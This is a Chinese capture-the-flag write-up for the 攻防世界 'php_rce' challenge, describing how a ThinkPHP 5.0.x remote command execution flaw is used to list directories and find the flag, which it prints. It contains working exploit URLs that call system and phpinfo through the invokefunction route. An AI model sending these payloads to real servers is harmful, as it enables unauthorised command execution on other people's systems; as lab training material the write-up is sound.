攻防世界-php_rce详解

php_rce

在这里插入图片描述
进入后发现是一个php框架,根据题目php-rce远程命令执行,我们在github上一下这个版本有什么漏洞:
在这里插入图片描述
在这里插入图片描述
发现好几个版本,我们只知道5.0随便输入一个试一试,发下新有提示为5.0.2
在这里插入图片描述
payload

6、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
7、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

(注意这里我们只复制thinkphp_5.0.21后面的,因为前面是靶场地址 )

发现可以进行远程命令执行:
在这里插入图片描述
ls查看目录没有什么可疑的
在这里插入图片描述
继续查看上级目录,最终在根目录下查到flag文件
在这里插入图片描述
用find命令查找与flag相关的
在这里插入图片描述
在这里插入图片描述
flag:
flag{thinkphp5_rce} flag{thinkphp5_rce}


版权声明:本文为Mr_helloword原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。